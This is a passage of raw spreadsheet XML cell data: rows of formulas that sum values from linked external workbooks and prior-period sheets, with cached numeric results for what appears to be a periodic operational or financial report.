        <f>'[10]23'!$V$102</f>
        <v>33.2072712418301</v>
      </c>
      <c r="X6" s="198">
        <f>'[10]23'!$Q$102</f>
        <v>0</v>
      </c>
      <c r="Y6" s="198">
        <f>'[10]23'!$R$102</f>
        <v>0</v>
      </c>
      <c r="Z6" s="198">
        <f>'[10]23'!$S$102</f>
        <v>2845.199</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1" spans="1:26">
      <c r="A7" s="191"/>
      <c r="B7" s="191"/>
      <c r="C7" s="201" t="s">
        <v>331</v>
      </c>
      <c r="D7" s="201"/>
      <c r="E7" s="194"/>
      <c r="F7" s="194">
        <f>'[12]23'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G7" s="194">
        <f>'[12]23'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H7" s="194">
        <f>G7+'22'!H7</f>
        <v>0</v>
      </c>
      <c r="I7" s="194">
        <f>H7+yc!I7</f>
        <v>0</v>
      </c>
      <c r="J7" s="194">
        <f>'[12]23'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K7" s="194">
        <f>J7+'22'!K7</f>
        <v>0</v>
      </c>
      <c r="L7" s="194">
        <f>K7+yc!L7</f>
        <v>0</v>
      </c>
      <c r="M7" s="194">
        <f>'[12]23'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N7" s="195"/>
      <c r="O7" s="199"/>
      <c r="P7" s="200"/>
      <c r="Q7" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R7" s="202">
        <f>'[10]23'!$W$107</f>
        <v>120.25</v>
      </c>
      <c r="S7" s="202">
        <f>'[10]23'!$X$107</f>
        <v>126.793424440483</v>
      </c>
      <c r="T7" s="198">
        <f>'[10]23'!$Y$107</f>
        <v>131.45755109793</v>
      </c>
      <c r="U7" s="198">
        <f>'[10]23'!$T$107</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V7" s="198">
        <f>'[10]23'!$U$107</f>
        <v>45.7336956521739</v>
      </c>
      <c r="W7" s="198">
        <f>'[10]23'!$V$107</f>
        <v>31.954715219421</v>
      </c>
      <c r="X7" s="198">
        <f>'[10]23'!$Q$107</f>
        <v>8</v>
      </c>
      <c r="Y7" s="198">
        <f>'[10]23'!$R$107</f>
        <v>252.45</v>
      </c>
      <c r="Z7" s="198">
        <f>'[10]23'!$S$107</f>
        <v>2737.88</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1" spans="1:26">
      <c r="A8" s="191"/>
      <c r="B8" s="191"/>
      <c r="C8" s="201" t="s">
        <v>236</v>
      </c>
      <c r="D8" s="201"/>
      <c r="E8" s="194"/>
      <c r="F8" s="194">
        <f>'[10]23'!$D$27+'[11]23'!$D$18+'[13]23'!$D$26+'[14]23'!$D$10+'[14]23'!$D$17+'[15]23'!$D$9</f>
        <v>41879.9</v>
      </c>
      <c r="G8" s="194">
        <f>'[10]23'!$E$27+'[11]23'!$E$18+'[13]23'!$E$26+'[14]23'!$E$10+'[14]23'!$E$17+'[15]23'!$E$9</f>
        <v>2358</v>
      </c>
      <c r="H8" s="194">
        <f>G8+'22'!H8</f>
        <v>47746</v>
      </c>
      <c r="I8" s="194">
        <f>H8+yc!I8</f>
        <v>573282.99</v>
      </c>
      <c r="J8" s="194">
        <f>'[10]23'!$I$27+'[11]23'!$I$18+'[13]23'!$I$26+'[14]23'!$E$25+'[14]23'!$E$32+'[15]23'!$H$9</f>
        <v>3004.79</v>
      </c>
      <c r="K8" s="194">
        <f>J8+'22'!K8</f>
        <v>58436.62</v>
      </c>
      <c r="L8" s="194">
        <f>K8+yc!L8</f>
        <v>566181.33</v>
      </c>
      <c r="M8" s="194">
        <f>'[10]23'!$L$27+'[11]23'!$L$18+'[13]23'!$L$26+'[14]23'!$H$25+'[14]23'!$H$32+'[15]23'!$K$9</f>
        <v>31189.28</v>
      </c>
      <c r="N8" s="195"/>
      <c r="O8" s="199"/>
      <c r="P8" s="200"/>
      <c r="Q8" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R8" s="198">
        <f>'[10]23'!$W$108</f>
        <v>128.32469775475</v>
      </c>
      <c r="S8" s="198">
        <f>'[10]23'!$X$108</f>
        <v>132.211205902698</v>
      </c>
      <c r="T8" s="198">
        <f>'[10]23'!$Y$108</f>
        <v>127.931235170345</v>
      </c>
      <c r="U8" s="198">
        <f>'[10]23'!$T$108</f>
        <v>48.25</v>
      </c>
      <c r="V8" s="198">
        <f>'[10]23'!$U$108</f>
        <v>47.1413043478261</v>
      </c>
      <c r="W8" s="198">
        <f>'[10]23'!$V$108</f>
        <v>28.6772875816993</v>
      </c>
      <c r="X8" s="198">
        <f>'[10]23'!$Q$108</f>
        <v>11.58</v>
      </c>
      <c r="Y8" s="198">
        <f>'[10]23'!$R$108</f>
        <v>260.22</v>
      </c>
      <c r="Z8" s="198">
        <f>'[10]23'!$S$108</f>
        <v>2457.07</v>
      </c>
    </row>
    <row r="9" ht="15.75" customHeight="1" spans="1:26">
      <c r="A9" s="191"/>
      <c r="B9" s="191"/>
      <c r="C9" s="201" t="s">
        <v>238</v>
      </c>
      <c r="D9" s="201"/>
      <c r="E9" s="194"/>
      <c r="F9" s="194">
        <f>'[10]23'!$D$24+'[11]23'!$D$19+'[12]23'!$D$20+'[13]23'!$D$27+'[14]23'!$D$11+'[14]23'!$D$18+'[15]23'!$D$10</f>
        <v>110865.712</v>
      </c>
      <c r="G9" s="194">
        <f>'[10]23'!$E$24+'[11]23'!$E$19+'[12]23'!$E$20+'[13]23'!$E$27+'[14]23'!$E$11+'[14]23'!$E$18+'[15]23'!$E$10</f>
        <v>21112</v>
      </c>
      <c r="H9" s="194">
        <f>G9+'22'!H9</f>
        <v>341456</v>
      </c>
      <c r="I9" s="194">
        <f>H9+yc!I9</f>
        <v>4476844.88</v>
      </c>
      <c r="J9" s="194">
        <f>'[10]23'!$I$24+'[11]23'!$I$19+'[12]23'!$I$20+'[13]23'!$I$27+'[14]23'!$E$26+'[14]23'!$E$33+'[15]23'!$H$10</f>
        <v>17143.296</v>
      </c>
      <c r="K9" s="194">
        <f>J9+'22'!K9</f>
        <v>357967.815</v>
      </c>
      <c r="L9" s="194">
        <f>K9+yc!L9</f>
        <v>4455446.626</v>
      </c>
      <c r="M9" s="194">
        <f>'[10]23'!$L$24+'[11]23'!$L$19+'[12]23'!$L$20+'[13]23'!$L$27+'[14]23'!$H$26+'[14]23'!$H$33+'[15]23'!$K$10</f>
        <v>94353.897</v>
      </c>
      <c r="N9" s="195"/>
      <c r="O9" s="199"/>
      <c r="P9" s="200"/>
      <c r="Q9" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R9" s="198">
        <f>'[10]23'!$W$109</f>
        <v>248.248686514886</v>
      </c>
      <c r="S9" s="198">
        <f>'[10]23'!$X$109</f>
        <v>265.017414464249</v>
      </c>
      <c r="T9" s="198">
        <f>'[10]23'!$Y$109</f>
        <v>270.902057288445</v>
      </c>
      <c r="U9" s="198">
        <f>'[10]23'!$T$109</f>
        <v>47.5833333333333</v>
      </c>
      <c r="V9" s="198">
        <f>'[10]23'!$U$109</f>
        <v>35.3695652173913</v>
      </c>
      <c r="W9" s="198">
        <f>'[10]23'!$V$109</f>
        <v>34.90697945845</v>
      </c>
      <c r="X9" s="198">
        <f>'[10]23'!$Q$109</f>
        <v>11.42</v>
      </c>
      <c r="Y9" s="198">
        <f>'[10]23'!$R$109</f>
        <v>195.24</v>
      </c>
      <c r="Z9" s="198">
        <f>'[10]23'!$S$109</f>
        <v>2990.82999999999</v>
      </c>
    </row>
    <row r="10" ht="15.75" customHeight="1" spans="1:26">
      <c r="A10" s="191"/>
      <c r="B10" s="191"/>
      <c r="C10" s="201" t="s">
        <v>295</v>
      </c>
      <c r="D10" s="201"/>
      <c r="E10" s="194"/>
      <c r="F10" s="194">
        <f>'[10]23'!$D$25+'[11]23'!$D$20+'[12]23'!$D$21+'[13]23'!$D$28+'[14]23'!$D$12+'[14]23'!$D$19+'[15]23'!$D$11</f>
        <v>61206.942</v>
      </c>
      <c r="G10" s="194">
        <f>'[10]23'!$E$25+'[11]23'!$E$20+'[12]23'!$E$21+'[13]23'!$E$28+'[14]23'!$E$12+'[14]23'!$E$19+'[15]23'!$E$11</f>
        <v>576</v>
      </c>
      <c r="H10" s="194">
        <f>G10+'22'!H10</f>
        <v>54837</v>
      </c>
      <c r="I10" s="194">
        <f>H10+yc!I10</f>
        <v>972364.17</v>
      </c>
      <c r="J10" s="194">
        <f>'[10]23'!$I$25+'[11]23'!$I$20+'[12]23'!$I$21+'[13]23'!$I$28+'[14]23'!$E$27+'[14]23'!$E$34+'[15]23'!$H$11</f>
        <v>2298.98</v>
      </c>
      <c r="K10" s="194">
        <f>J10+'22'!K10</f>
        <v>65764.4</v>
      </c>
      <c r="L10" s="194">
        <f>K10+yc!L10</f>
        <v>962993.12</v>
      </c>
      <c r="M10" s="194">
        <f>'[10]23'!$L$25+'[11]23'!$L$20+'[12]23'!$L$21+'[13]23'!$L$28+'[14]23'!$H$27+'[14]23'!$H$34+'[15]23'!$K$11</f>
        <v>50279.542</v>
      </c>
      <c r="N10" s="195"/>
      <c r="O10" s="199"/>
      <c r="P10" s="200"/>
      <c r="Q10" s="193" t="s">
        <v>296</v>
      </c>
      <c r="R10" s="198">
        <f>'[10]23'!$W$110</f>
        <v>244.30823117338</v>
      </c>
      <c r="S10" s="198">
        <f>'[10]23'!$X$110</f>
        <v>249.476608622315</v>
      </c>
      <c r="T10" s="198">
        <f>'[10]23'!$Y$110</f>
        <v>267.534048414671</v>
      </c>
      <c r="U10" s="198">
        <f>'[10]23'!$T$110</f>
        <v>47.5833333333333</v>
      </c>
      <c r="V10" s="198">
        <f>'[10]23'!$U$110</f>
        <v>36.5163043478261</v>
      </c>
      <c r="W10" s="198">
        <f>'[10]23'!$V$110</f>
        <v>34.6128618113912</v>
      </c>
      <c r="X10" s="198">
        <f>'[10]23'!$Q$110</f>
        <v>11.42</v>
      </c>
      <c r="Y10" s="198">
        <f>'[10]23'!$R$110</f>
        <v>201.57</v>
      </c>
      <c r="Z10" s="198">
        <f>'[10]23'!$S$110</f>
        <v>2965.63</v>
      </c>
    </row>
    <row r="11" ht="15.75" customHeight="1" spans="1:26">
      <c r="A11" s="191"/>
      <c r="B11" s="191"/>
      <c r="C11" s="201" t="s">
        <v>297</v>
      </c>
      <c r="D11" s="201"/>
      <c r="E11" s="194"/>
      <c r="F11" s="194">
        <f>'[10]23'!$D$26+'[11]23'!$D$21+'[12]23'!$D$19+'[13]23'!$D$29+'[14]23'!$D$13+'[14]23'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G11" s="194">
        <f>'[10]23'!$E$26+'[11]23'!$E$21+'[12]23'!$E$19+'[13]23'!$E$29+'[14]23'!$E$13+'[14]23'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H11" s="194">
        <f>G11+'22'!H11</f>
        <v>153.81</v>
      </c>
      <c r="I11" s="194">
        <f>H11+yc!I11</f>
        <v>153.81</v>
      </c>
      <c r="J11" s="194">
        <f>'[10]23'!$I$26+'[11]23'!$I$21+'[12]23'!$I$19+'[13]23'!$I$29+'[14]23'!$E$28+'[14]23'!$E$35</f>
        <v>0</v>
      </c>
      <c r="K11" s="194">
        <f>J11+'22'!K11</f>
        <v>0</v>
      </c>
      <c r="L11" s="194">
        <f>K11+yc!L11</f>
        <v>0</v>
      </c>
      <c r="M11" s="194">
        <f>'[10]23'!$L$26+'[11]23'!$L$21+'[12]23'!$L$19+'[13]23'!$L$29+'[14]23'!$H$28+'[14]23'!$H$35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4748.00000000002</v>
      </c>
      <c r="H12" s="194">
        <f>G12+'22'!H12</f>
        <v>181086.73</v>
      </c>
      <c r="I12" s="194">
        <f>H12+yc!I12</f>
        <v>5123477.98</v>
      </c>
      <c r="J12" s="194">
        <f>J22+J32+J42+J52+J62+J69</f>
        <v>19344.995</v>
      </c>
      <c r="K12" s="194">
        <f>J12+'22'!K12</f>
        <v>381203.03</v>
      </c>
      <c r="L12" s="194">
        <f>K12+yc!L12</f>
        <v>5410309.406</v>
      </c>
      <c r="M12" s="194">
        <f>M22+M32+M42+M52+M62+M69</f>
        <v>219716.585000051</v>
      </c>
      <c r="N12" s="205">
        <f>M12/439000*100</f>
        <v>50.0493359908999</v>
      </c>
      <c r="O12" s="199"/>
      <c r="P12" s="200"/>
      <c r="Q12" s="203" t="s">
        <v>299</v>
      </c>
      <c r="R12" s="204">
        <f>'[16]23'!$W$40</f>
        <v>0</v>
      </c>
      <c r="S12" s="204">
        <f>'[16]23'!$X$40</f>
        <v>0</v>
      </c>
      <c r="T12" s="204">
        <f>'[16]23'!$Y$40</f>
        <v>0</v>
      </c>
      <c r="U12" s="204">
        <f>'[16]23'!$T$40</f>
        <v>0</v>
      </c>
      <c r="V12" s="204">
        <f>'[16]23'!$U$40</f>
        <v>0</v>
      </c>
      <c r="W12" s="204">
        <f>'[16]23'!$V$40</f>
        <v>0</v>
      </c>
      <c r="X12" s="204">
        <f>'[16]23'!$Q$40</f>
        <v>0</v>
      </c>
      <c r="Y12" s="204">
        <f>'[16]23'!$R$40</f>
        <v>0</v>
      </c>
      <c r="Z12" s="204">
        <f>'[16]23'!$S$40</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="15.75" customHeight="1" spans="1:26">
      <c r="A13" s="191"/>
      <c r="B13" s="193"/>
      <c r="C13" s="193"/>
      <c r="D13" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E13" s="194">
        <f>E23+E33+E43+E53+E63+E70</f>
        <v>0</v>
      </c>
      <c r="F13" s="194">
        <f>F23+F33+F43+F53+F63+F70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G13" s="194">
        <f>G23+G33+G43+G53+G63+G70</f>
        <v>0</v>
      </c>
      <c r="H13" s="194">
        <f>G13+'22'!H13</f>
        <v>0</v>
      </c>
      <c r="I13" s="194">
        <f>H13+yc!I13</f>
        <v>0</v>
      </c>
      <c r="J13" s="194">
        <f>J23+J33+J43+J53+J63+J70</f>
        <v>0</v>
      </c>
      <c r="K13" s="194">
        <f>J13+'22'!K13</f>
        <v>0</v>
      </c>
      <c r="L13" s="194">
        <f>K13+yc!L13</f>
        <v>0</v>
      </c>
      <c r="M13" s="194">
        <f>M23+M33+M43+M53+M63+M70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="N13" s="207">
        <f>(M12+M13)/(315000+80000+150000)*100</f>
        <v>40.3149697247799</v>
      </c>
      <c r="O13" s="199"/>
      <c r="P13" s="208" t="s">
        <v>237</v>
      </c>
      <c r="Q13" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R13" s="209">
        <f>'[11]23'!$W$68</f>
        <v>0</v>
      </c>
      <c r="S13" s="209">
        <f>'[11]23'!$X$68</f>
        <v>263.636596158273</v>
      </c>
      <c r="T13" s="209">
        <f>'[11]23'!$Y$68</f>
        <v>266.206969721701</v>
      </c>
      <c r="U13" s="209">
        <f>'[11]23'!$T$68</f>
        <v>0</v>
      </c>
      <c r="V13" s="209">
        <f>'[11]23'!$U$68</f>
        <v>70.8278985507246</v>
      </c>
      <c r="W13" s="209">
        <f>'[11]23'!$V$68</f>
        <v>71.5044351073763</v>
      </c>
      <c r="X13" s="210" t="str">
        <f>'[11]23'!$Q$68</f>
        <v>0.00</v>
      </c>
      <c r="Y13" s="210" t="str">
        <f>'[11]23'!$R$68</f>
        <v>390.97</v>
      </c>
      <c r="Z13" s="210" t="str">
        <f>'[11]23'!$S$68</f>
        <v>6126.50</v>
      </c>
    </row>
    <row r="14" ht="15.75" customHeight="1" spans="1:26">
      <c r="A14" s="191"/>
      <c r="B14" s="193"/>
      <c r="C14" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D14" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E14" s="194">
        <f>E24+E34+E44+E54</f>
        <v>0</v>
      </c>
      <c r="F14" s="194">
        <f>F24+F34+F44+F54</f>
        <v>0</v>
      </c>
      <c r="G14" s="194">
        <f>G24+G34+G44+G54+G62</f>
        <v>2680</v>
      </c>
      <c r="H14" s="194">
        <f>G14+'22'!H14</f>
        <v>63516</v>
      </c>
      <c r="I14" s="194">
        <f>H14+yc!I14</f>
        <v>1028059.676</v>
      </c>
      <c r="J14" s="194">
        <f>J24+J34+J44+J54+J62</f>
        <v>4848.68</v>
      </c>
      <c r="K14" s="194">
        <f>J14+'22'!K14</f>
        <v>121010.125</v>
      </c>
      <c r="L14" s="194">
        <f>K14+yc!L14</f>
        <v>1913954.231</v>
      </c>
      <c r="M14" s="194">
        <f>M24+M34+M44+M54</f>
        <v>55872.78</v>
      </c>
      <c r="N14" s="211"/>
      <c r="O14" s="199"/>
      <c r="P14" s="208"/>
      <c r="Q14" s="193" t="s">
        <v>239</v>
      </c>
      <c r="R14" s="209">
        <f>'[11]23'!$W$71</f>
        <v>242.5</v>
      </c>
      <c r="S14" s="209">
        <f>'[11]23'!$X$71</f>
        <v>219.159369527145</v>
      </c>
      <c r="T14" s="209">
        <f>'[11]23'!$Y$71</f>
        <v>213.87517393321</v>
      </c>
      <c r="U14" s="209">
        <f>'[11]23'!$T$71</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V14" s="209">
        <f>'[11]23'!$U$71</f>
        <v>51.7210144927536</v>
      </c>
      <c r="W14" s="209">
        <f>'[11]23'!$V$71</f>
        <v>50.3267973856209</v>
      </c>
      <c r="X14" s="210" t="str">
        <f>'[11]23'!$Q$71</f>
        <v>8.00</v>
      </c>
      <c r="Y14" s="210" t="str">
        <f>'[11]23'!$R$71</f>
        <v>285.50</v>
      </c>
      <c r="Z14" s="210" t="str">
        <f>'[11]23'!$S$71</f>
        <v>4312.00</v>
      </c>
    </row>
    <row r="15" ht="15.75" customHeight="1" spans="1:26">
      <c r="A15" s="191"/>
      <c r="B15" s="193"/>
      <c r="C15" s="193"/>
      <c r="D15" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E15" s="194">
        <f>E25+E35+E45+E55</f>
        <v>0</v>
      </c>
      <c r="F15" s="194">
        <f>F25+F35+F45+F55</f>
        <v>0</v>
      </c>
      <c r="G15" s="194">
        <f>G25+G35+G45+G55</f>
        <v>0</v>
      </c>
      <c r="H15" s="194">
        <f>G15+'22'!H15</f>
        <v>0</v>
      </c>
      <c r="I15" s="194">
        <f>H15+yc!I15</f>
        <v>0</v>
      </c>
      <c r="J15" s="194">
        <f>J25+J35+J45+J55</f>
        <v>896.315000000001</v>
      </c>
      <c r="K15" s="194">
        <f>J15+'22'!K15</f>
        <v>7305.375</v>
      </c>
      <c r="L15" s="194">
        <f>K15+yc!L15</f>
        <v>122061.875</v>
      </c>
      <c r="M15" s="194"/>
      <c r="N15" s="212"/>
      <c r="O15" s="199"/>
      <c r="P15" s="208"/>
      <c r="Q15" s="193" t="s">
        <v>241</v>
      </c>
      <c r="R15" s="209">
        <f>'[11]23'!$W$72</f>
        <v>63.2857142857143</v>
      </c>
      <c r="S15" s="209">
        <f>'[11]23'!$X$72</f>
        <v>63.9480489293082</v>
      </c>
      <c r="T15" s="209">
        <f>'[11]23'!$Y$72</f>
        <v>61.492021837119</v>
      </c>
      <c r="U15" s="209">
        <f>'[11]23'!$T$72</f>
        <v>58.3333333333333</v>
      </c>
      <c r="V15" s="209">
        <f>'[11]23'!$U$72</f>
        <v>62.3496376811594</v>
      </c>
      <c r="W15" s="209">
        <f>'[11]23'!$V$72</f>
        <v>51.5017507002801</v>
      </c>
      <c r="X15" s="210" t="str">
        <f>'[11]23'!$Q$72</f>
        <v>14.00</v>
      </c>
      <c r="Y15" s="210" t="str">
        <f>'[11]23'!$R$72</f>
        <v>344.17</v>
      </c>
      <c r="Z15" s="210" t="str">
        <f>'[11]23'!$S$72</f>
        <v>4412.67</v>
      </c>
    </row>
    <row r="16" ht="15.75" customHeight="1" spans="1:26">
      <c r="A16" s="191"/>
      <c r="B16" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C16" s="193"/>
      <c r="D16" s="193"/>
      <c r="E16" s="194">
        <f>E26+E36+E46+E56+E64+E71</f>
        <v>0</v>
      </c>
      <c r="F16" s="194"/>
      <c r="G16" s="194">
        <f>G26+G36+G46+G56+G64+G71</f>
        <v>0</v>
      </c>
      <c r="H16" s="194">
        <f>G16+'22'!H16</f>
        <v>0</v>
      </c>
      <c r="I16" s="194">
        <f>H16+yc!I16</f>
        <v>0</v>
      </c>
      <c r="J16" s="194">
        <f>J26+J36+J46+J56+J64+J71+J75</f>
        <v>0</v>
      </c>
      <c r="K16" s="194">
        <f>J16+'22'!K16</f>
        <v>0</v>
      </c>
      <c r="L16" s="194">
        <f>K16+yc!L16</f>
        <v>0</v>
      </c>
      <c r="M16" s="194"/>
      <c r="N16" s="195"/>
      <c r="O16" s="199"/>
      <c r="P16" s="208"/>
      <c r="Q16" s="193" t="s">
        <v>243</v>
      </c>
      <c r="R16" s="209">
        <f>'[11]23'!$W$73</f>
        <v>64.0714285714286</v>
      </c>
      <c r="S16" s="209">
        <f>'[11]23'!$X$73</f>
        <v>61.532782463015</v>
      </c>
      <c r="T16" s="209">
        <f>'[11]23'!$Y$73</f>
        <v>62.8096706959401</v>
      </c>
      <c r="U16" s="209">
        <f>'[11]23'!$T$73</f>
        <v>58.3333333333333</v>
      </c>
      <c r="V16" s="209">
        <f>'[11]23'!$U$73</f>
        <v>63.7989130434783</v>
      </c>
      <c r="W16" s="209">
        <f>'[11]23'!$V$73</f>
        <v>53.0856676003735</v>
      </c>
      <c r="X16" s="210" t="str">
        <f>'[11]23'!$Q$73</f>
        <v>14.00</v>
      </c>
      <c r="Y16" s="210" t="str">
        <f>'[11]23'!$R$73</f>
        <v>352.17</v>
      </c>
      <c r="Z16" s="210" t="str">
        <f>'[11]23'!$S$73</f>
        <v>4548.38</v>
      </c>
    </row>
    <row r="17" ht="15.75" customHeight="1" spans="1:26">
      <c r="A17" s="191"/>
      <c r="B17" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C17" s="193"/>
      <c r="D17" s="193"/>
      <c r="E17" s="194">
        <f>E27+E37+E47+E57+E65+E72+E83</f>
        <v>650000</v>
      </c>
      <c r="F17" s="194"/>
      <c r="G17" s="194">
        <f>G27+G37+G47+G57+G65+G72</f>
        <v>0</v>
      </c>
      <c r="H17" s="194">
        <f>G17+'22'!H17</f>
        <v>0</v>
      </c>
      <c r="I17" s="194">
        <f>H17+yc!I17</f>
        <v>0</v>
      </c>
      <c r="J17" s="194">
        <f>J27+J37+J47+J57+J65+J72+J76</f>
        <v>0</v>
      </c>
      <c r="K17" s="194">
        <f>J17+'22'!K17</f>
        <v>0</v>
      </c>
      <c r="L17" s="194">
        <f>K17+yc!L17</f>
        <v>0</v>
      </c>
      <c r="M17" s="194"/>
      <c r="N17" s="195"/>
      <c r="O17" s="199"/>
      <c r="P17" s="213" t="s">
        <v>252</v>
      </c>
      <c r="Q17" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R17" s="209">
        <f>'[12]23'!$W$71</f>
        <v>0</v>
      </c>
      <c r="S17" s="209">
        <f>'[12]23'!$X$71</f>
        <v>0</v>
      </c>
      <c r="T17" s="209">
        <f>'[12]23'!$Y$71</f>
        <v>0</v>
      </c>
      <c r="U17" s="209">
        <f>'[12]23'!$T$71</f>
        <v>0</v>
      </c>
      <c r="V17" s="209">
        <f>'[12]23'!$U$71</f>
        <v>0</v>
      </c>
      <c r="W17" s="209">
        <f>'[12]23'!$V$71</f>
        <v>0</v>
      </c>
      <c r="X17" s="209">
        <f>'[12]23'!$Q$71</f>
        <v>0</v>
      </c>
      <c r="Y17" s="209">
        <f>'[12]23'!$R$71</f>
        <v>0</v>
      </c>
      <c r="Z17" s="209">
        <f>'[12]23'!$S$71</f>
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="15.75" customHeight="1" spans="1:26">
      <c r="A18" s="191"/>
      <c r="B18" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C18" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D18" s="193"/>
      <c r="E18" s="194">
        <f>E28+E38+E48+E58+E66+E73</f>
        <v>0</v>
      </c>
      <c r="F18" s="194"/>
      <c r="G18" s="194">
        <f>G28+G38+G48+G58+G66+G73</f>
        <v>0</v>
      </c>
      <c r="H18" s="194">
        <f>G18+'22'!H18</f>
        <v>0</v>
      </c>
      <c r="I18" s="194">
        <f>H18+yc!I18</f>
        <v>0</v>
      </c>
      <c r="J18" s="194">
        <f>J28+J38+J48+J58+J66+J73</f>
        <v>0</v>
      </c>
      <c r="K18" s="194">
        <f>J18+'22'!K18</f>
        <v>0</v>
      </c>
      <c r="L18" s="194">
        <f>K18+yc!L18</f>
        <v>0</v>
      </c>
      <c r="M18" s="194"/>
      <c r="N18" s="195"/>
      <c r="O18" s="199"/>
      <c r="P18" s="214"/>
      <c r="Q18" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R18" s="209">
        <f>'[12]23'!$W$74</f>
        <v>218.7</v>
      </c>
      <c r="S18" s="209">
        <f>'[12]23'!$X$74</f>
        <v>217.185714285714</v>
      </c>
      <c r="T18" s="209">
        <f>'[12]23'!$Y$74</f>
        <v>221.82678461222</v>
      </c>
      <c r="U18" s="209">
        <f>'[12]23'!$T$74</f>
        <v>41.6666666666667</v>
      </c>
      <c r="V18" s="209">
        <f>'[12]23'!$U$74</f>
        <v>12.6811594202899</v>
      </c>
      <c r="W18" s="209">
        <f>'[12]23'!$V$74</f>
        <v>7.37546685340803</v>
      </c>
      <c r="X18" s="209">
        <f>'[12]23'!$Q$74</f>
        <v>10</v>
      </c>
      <c r="Y18" s="209">
        <f>'[12]23'!$R$74</f>
        <v>70</v>
      </c>
      <c r="Z18" s="209">
        <f>'[12]23'!$S$74</f>
        <v>631.93</v>
      </c>
    </row>
    <row r="19" ht="15.75" customHeight="1" spans="1:26">
      <c r="A19" s="191"/>
      <c r="B19" s="191"/>
      <c r="C19" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D19" s="193"/>
      <c r="E19" s="194">
        <f>E29+E39+E49+E59+E67+E74</f>
        <v>0</v>
      </c>
      <c r="F19" s="194"/>
      <c r="G19" s="194">
        <f>G29+G39+G49+G59+G67+G74</f>
        <v>0</v>
      </c>
      <c r="H19" s="194">
        <f>G19+'22'!H19</f>
        <v>0</v>
      </c>
      <c r="I19" s="194">
        <f>H19+yc!I19</f>
        <v>0</v>
      </c>
      <c r="J19" s="194">
        <f>J29+J39+J49+J59+J67+J74+J78</f>
        <v>0</v>
      </c>
      <c r="K19" s="194">
        <f>J19+'22'!K19</f>
        <v>0</v>
      </c>
      <c r="L19" s="194">
        <f>K19+yc!L19</f>
        <v>0</v>
      </c>
      <c r="M19" s="194"/>
      <c r="N19" s="195"/>
      <c r="O19" s="199"/>
      <c r="P19" s="213" t="s">
        <v>304</v>
      </c>
      <c r="Q19" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R19" s="209">
        <f>'[13]23'!$W$72</f>
        <v>1e-5</v>
      </c>
      <c r="S19" s="209">
        <f>'[13]23'!$X$72</f>
        <v>9.99999999999999e-6</v>
      </c>
      <c r="T19" s="209">
        <f>'[13]23'!$Y$72</f>
        <v>9.14835164835165e-6</v>
      </c>
      <c r="U19" s="209">
        <f>'[13]23'!$T$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V19" s="209">
        <f>'[13]23'!$U$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W19" s="209">
        <f>'[13]23'!$V$72</f>
        <v>4.2483660130719e-6</v>
      </c>
      <c r="X19" s="209">
        <f>'[13]23'!$Q$72</f>
        <v>1e-6</v>
      </c>
      <c r="Y19" s="209">
        <f>'[13]23'!$R$72</f>
        <v>2.3e-5</v>
      </c>
      <c r="Z19" s="209">
        <f>'[13]23'!$S$72</f>
        <v>0.000364</v>
      </c>
    </row>
    <row r="20" ht="15.75" customHeight="1" spans="1:26">
      <c r="A20" s="191"/>
      <c r="B20" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C20" s="193"/>
      <c r="D20" s="193"/>
      <c r="E20" s="194">
        <f>E30+E40+E50+E60</f>
        <v>0</v>
      </c>
      <c r="F20" s="194"/>
      <c r="G20" s="194">
        <f>G30+G40+G50+G60</f>
        <v>0</v>
      </c>
      <c r="H20" s="194">
        <f>G20+'22'!H20</f>
        <v>0</v>
      </c>
      <c r="I20" s="194">
        <f>H20+yc!I20</f>
        <v>0</v>
      </c>
      <c r="J20" s="194">
        <f>J30+J40+J50+J60</f>
        <v>0</v>
      </c>
      <c r="K20" s="194">
        <f>J20+'22'!K20</f>
        <v>0</v>
      </c>
      <c r="L20" s="194">
        <f>K20+yc!L20</f>
        <v>0</v>
      </c>
      <c r="M20" s="194"/>
      <c r="N20" s="195"/>
      <c r="O20" s="199"/>
      <c r="P20" s="215"/>
      <c r="Q20" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R20" s="209">
        <f>'[13]23'!$W$73</f>
        <v>197.833325090279</v>
      </c>
      <c r="S20" s="209">
        <f>'[13]23'!$X$73</f>
        <v>170.756601852946</v>
      </c>
      <c r="T20" s="209">
        <f>'[13]23'!$Y$73</f>
        <v>238.25028327297</v>
      </c>
      <c r="U20" s="209">
        <f>'[13]23'!$T$73</f>
        <v>100.000004166667</v>
      </c>
      <c r="V20" s="209">
        <f>'[13]23'!$U$73</f>
        <v>16.2880476449275</v>
      </c>
      <c r="W20" s="209">
        <f>'[13]23'!$V$73</f>
        <v>68.5298828664799</v>
      </c>
      <c r="X20" s="209">
        <f>'[13]23'!$Q$73</f>
        <v>24.000001</v>
      </c>
      <c r="Y20" s="209">
        <f>'[13]23'!$R$73</f>
        <v>89.910023</v>
      </c>
      <c r="Z20" s="209">
